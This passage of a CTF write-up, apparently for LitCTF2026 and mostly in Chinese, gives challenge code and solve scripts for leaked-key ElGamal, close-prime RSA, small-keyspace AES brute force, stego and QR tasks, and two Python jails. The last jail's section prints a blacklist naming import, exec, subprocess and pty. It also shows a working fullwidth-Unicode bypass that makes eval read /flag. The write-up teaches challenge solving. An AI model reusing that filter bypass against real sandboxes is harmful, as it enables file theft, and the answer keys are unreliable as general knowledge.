x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884

ElGamal 回顾#

加密过程：

选取随机数 k
c1 = g^k mod p
c2 = m · y^k mod p，其中 y = g^x mod p

解密过程：

共享秘密 s = c1^x mod p = g^$kx$ mod p = y^k mod p
明文 m = c2 · s^$\-1$ mod p

解题脚本#

1
from Crypto.Util.number import long_to_bytes
2

3
p  = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
4
g  = 3
5
y  = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357
6
c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
7
c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654
8
x  = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884
9

10
s = pow(c1, x, p)
11
m = (c2 * pow(s, -1, p)) % p
12
print(long_to_bytes(m))

litctf{elgamal_leak_makes_happy_decrypt}

lit_rsa_neighbor#

题目原件

1
#!/usr/bin/env python3
2
"""
3
LitCTF2026 — RSA where q is 'far' along the prime line but still close enough to p for Fermat.
4
"""
5
from __future__ import annotations
6

7
import argparse
8
from pathlib import Path
9

10
import gmpy2
11
from Crypto.Util.number import bytes_to_long, getPrime
12

13
try:
14
    from secret import FLAG, NEXT_PRIME_STEPS
15
except ImportError as e:
16
    raise SystemExit(
17
        "secret.py is required to generate output (FLAG, NEXT_PRIME_STEPS)."
18
    ) from e
19

20
E = 65537
21

22

23
def main() -> None:
24
    parser = argparse.ArgumentParser()
25
    parser.add_argument(
26
        "--write",
27
        type=Path,
28
        help="Write n, c to this file.",
29
    )
30
    args = parser.parse_args()
31

32
    p = getPrime(512)
33
    q = p
34
    for _ in range(NEXT_PRIME_STEPS):
35
        q = int(gmpy2.next_prime(q))
36

37
    n = p * q
38
    m = bytes_to_long(FLAG)
39
    if m >= n:
40
        raise ValueError("flag too large for n")
41

42
    c = pow(m, E, n)
43

44
    lines_players = [f"{n = }", f"{c = }", f"e = {E}"]
45
    text = "\n".join(lines_players) + "\n"
46
    print(text, end="")
47
    if args.write:
48
        args.write.write_text(text, encoding="utf-8")
49

50

51
if __name__ == "__main__":
52
    main()
53

54
# n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
55
# c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
56
# e = 65537

题目源码核心逻辑:

1
p = getPrime(512)
2
q = p
3
for _ in range(NEXT_PRIME_STEPS):
4
    q = int(gmpy2.next_prime(q))
5

6
n = p * q
7
c = pow(m, E, n)

q 是从 p 开始连续调用 next\_prime 若干次得到的,因此 p 和 q 非常接近(只差几个素数间隙)。

给定数据:

1
n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
2
c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
3
e = 65537

解题思路

当 `p` 和 `q` 很接近时,适用 Fermat 因式分解法:

设 n = p \* q,令 a = $p \+ q$ / 2,b = $q \- p$ / 2,则:

$n = a^2 - b^2$

从 a = ⌈√n⌉ 开始递增,每次检查 a² \- n 是否为完全平方数。当 p 和 q 接近时,a 离 √n 很近,迭代次数极少。

解题脚本

1
#!/usr/bin/env python3
2
import gmpy2
3
from Crypto.Util.number import long_to_bytes
4

5
n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
6
c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
7
e = 65537
8

9
# Fermat factorization
10
a = gmpy2.isqrt(n) + 1
11
count = 0
12
while True:
13
    b2 = a * a - n
14
    if gmpy2.is_square(b2):
15
        b = gmpy2.isqrt(b2)
16
        p = int(a - b)
17
        q = int(a + b)
18
        print(f"Found after {count} iterations")
19
        print(f"p = {p}")
20
        print(f"q = {q}")
21
        break
22
    a += 1
23
    count += 1
24
    if count % 100000 == 0:
25
        print(f"iter {count}")
26

27
assert p * q == n
28
phi = (p - 1) * (q - 1)
29
d = pow(e, -1, phi)
30
m = pow(c, d, n)
31
flag = long_to_bytes(int(m))
32
print(flag)

litctf{rsa_fermat_finds_close_primes}

lit_tiny_key_aes#

题目原件

1
#!/usr/bin/env python3
2
"""
3
LitCTF2026 — AES-128-ECB with a mostly fixed key (weak operational policy).
4
"""
5
from __future__ import annotations
6

7
import argparse
8
from pathlib import Path
9

10
from Crypto.Cipher import AES
11
from Crypto.Util.Padding import pad
12

13
try:
14
    from secret import FLAG, UNKNOWN_KEY_SUFFIX
15
except ImportError as e:
16
    raise SystemExit(
17
        "secret.py is required to generate ciphertext (contains FLAG and key suffix)."
18
    ) from e
19

20
KEY_PREFIX = b"LitCTF2026!!!"  # 13 bytes; 3 bytes brute-forced
21
assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16
22

23

24
def encrypt_aes_ecb_pkcs7(plaintext: bytes, key: bytes) -> bytes:
25
    cipher = AES.new(key, AES.MODE_ECB)
26
    return cipher.encrypt(pad(plaintext, AES.block_size))
27

28

29
def main() -> None:
30
    parser = argparse.ArgumentParser()
31
    parser.add_argument(
32
        "--write",
33
        type=Path,
34
        help="Write ciphertext hex to this file.",
35
    )
36
    args = parser.parse_args()
37

38
    key = KEY_PREFIX + UNKNOWN_KEY_SUFFIX
39
    c = encrypt_aes_ecb_pkcs7(FLAG, key)
40
    line = f"c = {c!r}\n"
41
    print(line, end="")
42
    if args.write:
43
        args.write.write_text(line, encoding="utf-8")
44

45

46
if __name__ == "__main__":
47
    main()
48

49
# c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd\x0c\xb9\xb6\xb2J<\x86\x19\x06K\xb3\xa2\xa4\x18\x87<v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3"

题目分析

题目给出一份 AES-128-ECB 加密脚本和一段密文：

1
KEY_PREFIX = b"LitCTF2026!!!"  # 13 bytes; 3 bytes brute-forced
2
assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16

关键信息：

AES-128 密钥共 16 字节
前 13 字节是已知常量 LitCTF2026\!\!\!
后 3 字节随机未知（即 UNKNOWN\_KEY\_SUFFIX）
注释里也写明 3 bytes brute\-forced

思路

未知部分仅 3 字节，搜索空间 256³ ≈ 1.6×10⁷，单机几十秒内即可枚举完。

对每个候选 key 解密，再用两条筛选条件锁定真 key：

PKCS7 unpad 不抛异常（过滤掉绝大多数错误 key）
解密结果全部是可打印 ASCII

解题脚本

1
#!/usr/bin/env python3
2
from Crypto.Cipher import AES
3
from Crypto.Util.Padding import unpad
4
from itertools import product
5

6
KEY_PREFIX = b"LitCTF2026!!!"
7
c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd" \
8
    b"\x0c\xb9\xb6\xb2J<\x86\x19\x06K\xb3\xa2\xa4\x18\x87<" \
9
    b"v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3"
10

11
for s in product(range(256), repeat=3):
12
    key = KEY_PREFIX + bytes(s)
13
    pt = AES.new(key, AES.MODE_ECB).decrypt(c)
14
    try:
15
        flag = unpad(pt, 16)
16
    except ValueError:
17
        continue
18
    if all(32 <= b < 127 for b in flag):
19
        print(f"suffix = {bytes(s)!r}")
20
        print(f"flag   = {flag.decode()}")
21
        break

litctf{aes_tiny_brut3_for_the_win!}

Misc#

lit_lsb_base64#

题目提示是LSB隐写，直接扔进随波逐流

base64解码

拿到flag

1
LitCTF{lsb_1s_fun_w1th_b4s3_64}

lit_rush_qr#

附件给了一个gif，我们可以用iloveimg这个网站把gif转为图片

可以发现二维码缺少定位符，依旧随波逐流

补全三个定位角之后即可识别

得到

1
LitCTF{qr_h1gh_3rr_c0r_r3c0v3ry}

lit_welcome#

依旧拖进随波逐流

lsb分析

拿到flag

1
LitCTF{w3lc0m3_t0_m1sc_w0rld}

lit_sstv#

直接用在线网站解sstv

https://sstv\-decoder\.mathieurenaud\.fr/

拿到flag

1
LitCTF{sstv_p4t13nc3}

lit_pyjail_reader#

题目原件

1
#!/usr/bin/env python3
2
"""LitCTF — 入门 Pyjail：验证码 + 按指引两次只读文件（无 RCE）。"""
3

4
import secrets
5
import socket
6
import string
7
import threading
8

9
HOST = "0.0.0.0"
10
PORT = 9999
11
MAX_QUEUED = 64
12
MAX_LINE = 512
13
MAX_FILE = 4096
14

15

16
def recv_line(conn: socket.socket) -> str:
17
    data = bytearray()
18
    while len(data) < MAX_LINE:
19
        chunk = conn.recv(1)
20
        if not chunk:
21
            break
22
        if chunk == b"\n":
23
            break
24
        data += chunk
25
    return data.decode("utf-8", errors="replace").strip()
26

27

28
def safe_read(path: str) -> str:
29
    p = path.strip()
30
    if not p or p.startswith("-") or "\x00" in p:
31
        raise ValueError("invalid path")
32
    with open(p, "r", errors="replace") as f:
33
        return f.read(MAX_FILE)
34

35

36
def handle(conn: socket.socket) -> None:
37
    try:
38
        conn.settimeout(120)
39
        alphabet = string.ascii_uppercase
40
        challenge = "".join(secrets.choice(alphabet) for _ in range(8))
41
        conn.sendall(
42
            f"Please enter the reverse of '{challenge}' to continue: ".encode()
43
        )
44
        ans = recv_line(conn)
45
        if ans != challenge[::-1]:
46
            conn.sendall(b"Wrong reverse string. Bye.\n")
47
            return
48
        conn.sendall(
49
            b"Good.\n"
50
            b"Step 1: read /app/where_is_flag.txt (it contains the flag path).\n"
51
            b"Step 2: read that path.\n"
52
            b"File path (1/2): "
53
        )
54
        p1 = recv_line(conn)
55
        try:
56
            c1 = safe_read(p1)
57
        except Exception as e:
58
            conn.sendall(f"Error: {e}\n".encode(errors="replace"))
59
            return
60
        conn.sendall(b"--- begin ---\n")
61
        conn.sendall(c1.encode(errors="replace"))
62
        conn.sendall(b"\n--- end ---\nFile path (2/2): ")
63
        p2 = recv_line(conn)
64
        try:
65
            c2 = safe_read(p2)
66
        except Exception as e:
67
            conn.sendall(f"Error: {e}\n".encode(errors="replace"))
68
            return
69
        conn.sendall(c2.encode(errors="replace"))
70
        conn.sendall(b"\n")
71
    finally:
72
        conn.close()
73

74

75
def main() -> None:
76
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
77
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
78
    srv.bind((HOST, PORT))
79
    srv.listen(MAX_QUEUED)
80
    while True:
81
        client, _ = srv.accept()
82
        threading.Thread(target=handle, args=(client,), daemon=True).start()
83

84

85
if __name__ == "__main__":
86
    main()

对题目原件分析后

整道题不需要任何绕过，完全按照服务器的 Step1 / Step2 顺序走即可。脚本主要负责：

接收 banner，正则提取 8 字母 challenge
反转后送回
发送 /app/where\_is\_flag\.txt
解析 \-\-\- begin \-\-\- \.\.\. \-\-\- end \-\-\- 之间的内容拿到真实路径
把这个路径再发回去，收最后输出

经典的新手引导型交互题

流程：

反转验证码

读取： /app/where_is_flag.txt

得到真正 flag 路径

第二次读取那个路径

拿 flag

1
flag{sisx9chi-ciik-4cd-81xr-vcfrxt7frexgh}

lit_pyjail_unicode#

原件

1
#!/usr/bin/env python3
2
"""LitCTF — Unicode 标识符绕过：过滤检查原始源码字符串，解释器仍接受全角等价标识符。"""
3

4
import re
5
import socket
6
import threading
7

8
HOST = "0.0.0.0"
9
PORT = 9999
10
MAX_QUEUED = 64
11
MAX_LINE = 240
12

13
# 仅检查「你键入的文本」：ASCII 关键字用词边界，避免匹配到 important 等
14
BANNED = re.compile(
15
    r"\bimport\b|\bexec\b|\beval\b|\bopen\b|\bcompile\b|\bglobals\b|\blocals\b|__|"
16
    r"\bgetattr\b|\bsetattr\b|\bdelattr\b|\bvars\b|\bbreakpoint\b|\binput\b|"
17
    r"\bsubprocess\b|\bpty\b|os.|sys.|\bposix\b",
18
    re.IGNORECASE,
19
)
20

21

22
def banned(raw: str) -> bool:
23
    if "\\u" in raw or "\\U" in raw or "\\x" in raw:
24
        return True
25
    return BANNED.search(raw) is not None
26

27

28
def handle(conn: socket.socket) -> None:
29
    try:
30
        conn.settimeout(60)
31
        conn.sendall(
32
            b"=== LitCTF pyjail unicode ===\n"
33
            b"Send ONE line of Python. It will be eval() with full __builtins__.\n"
34
            b"ASCII blacklist applies to your *source text* (see attachment jail.py).\n"
35
            b"Goal: read /flag and get its str content.\n> "
36
        )
37
        raw = bytearray()
38
        while len(raw) < MAX_LINE:
39
            ch = conn.recv(1)
40
            if not ch:
41
                break
42
            if ch == b"\n":
43
                break
44
            raw += ch
45
        line = raw.decode("utf-8", errors="replace").strip()
46
        if not line:
47
            conn.sendall(b"empty\n")
48
            return
49
        if banned(line):
50
            conn.sendall(b"disallowed pattern in source\n")
51
            return
52
        try:
53
            out = eval(line, {"__builtins__": __builtins__})
54
            conn.sendall(repr(out).encode(errors="replace") + b"\n")
55
        except Exception as e:
56
            conn.sendall(f"{type(e).__name__}: {e}\n".encode(errors="replace"))
57
    finally:
58
        conn.close()
59

60

61
def main() -> None:
62
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
63
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
64
    srv.bind((HOST, PORT))
65
    srv.listen(MAX_QUEUED)
66
    while True:
67
        c, _ = srv.accept()
68
        threading.Thread(target=handle, args=(c,), daemon=True).start()
69

70

71
if __name__ == "__main__":
72
    main()

题目给了一个 Python pyjail，并提示：

1
Send ONE line of Python. It will be eval() with full __builtins__.
2
ASCII blacklist applies to your source text.
3
Goal: read /flag

源码关键部分：

1
BANNED = re.compile(
2
    r"\bimport\b|\bexec\b|\beval\b|\bopen\b|..."
3
)
4

5
if banned(line):
6
    conn.sendall(b"disallowed pattern in source\n")
7
    return
8

9
out = eval(line, {"__builtins__": __builtins__})

可以看到：

黑名单只检查「原始输入字符串」
但 eval 使用完整 builtins
并没有真正删除 open

题目名是 unicode，因此考虑 Unicode 标识符绕过。

一句话总结

黑名单看的是字节，解析器看的是 NFKC 归一化后的标识符——两者认知不一致就是这道题的洞。把 open 写成全角 ｏｐｅｎ，正则一无所知，编译器照常解析为内置 open，eval 一行 ｏｐｅｎ$\&\#39;/flag\&\#39;$\.read 收工。

用全角字符绕过

1
import socket
2

3
HOST = "challenge.cyclens.tech"
4
PORT = 32326
5

6
s = socket.socket()
7
s.connect((HOST, PORT))
8

9
print(s.recv(4096).decode())
10

11
payload = "ｏｐｅｎ('/flag').read()\n"
12

13
s.send(payload.encode())
14

15
print(s.recv(4096).decode())
16

17
s.close()